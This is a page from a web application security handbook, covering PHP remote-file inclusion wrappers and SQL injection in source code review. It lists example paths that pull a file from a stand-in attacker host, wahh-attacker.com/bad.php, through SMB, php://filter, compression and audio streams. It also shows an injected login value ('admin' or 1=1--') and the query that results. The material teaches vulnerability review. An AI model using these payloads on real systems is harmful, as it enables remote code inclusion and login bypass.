the-web-application-hackers-handbook

Chapter 19 n Finding Vulnerabilities in Source Code 729
Even if allow_url_fopen is set to 0, the methods listed in Table 19-9 may still
enable an attacker to access remote files (depending on the extensions installed).
Table 19-9: Methods That May Allow Access to Remote Files Even If allow_url_fopen
Is Set to 0
METHOD
SMB
PHP input/output
streams
Compression streams
Audio streams
EXAMPLE
\\wahh-attacker.com\bad.php
php://filter/resource=http://wahh-attacker.
com/bad.php
compress.zlib://http://wahh-attacker.com/
bad.php
ogg://http://wahh-attacker.com/bad.php
NOTE PHP 5.2 and later releases have a new option, allow_url_include,
which is disabled by default. This default configuration prevents any of the
preceding methods from being used to specify a remote file when calling one
of the file include functions.
Database Access
The following functions are used to send a query to a database and retrieve
the results:
n mysql_query
n mssql_query
n pg_query
The SQL statement is passed as a simple string. If user-controllable input
is part of the string parameter, the application is probably vulnerable to SQL
injection. For example:
$username = “admin’ or 1=1--”;
$password = “foo”;
$sql=”SELECT * FROM users WHERE username = ‘$username’
AND password = ‘$password’”;
$result = mysql_query($sql, $link)
executes this unintended query:
SELECT * FROM users WHERE username = ‘admin’ or 1=1--’
AND password = ‘foo’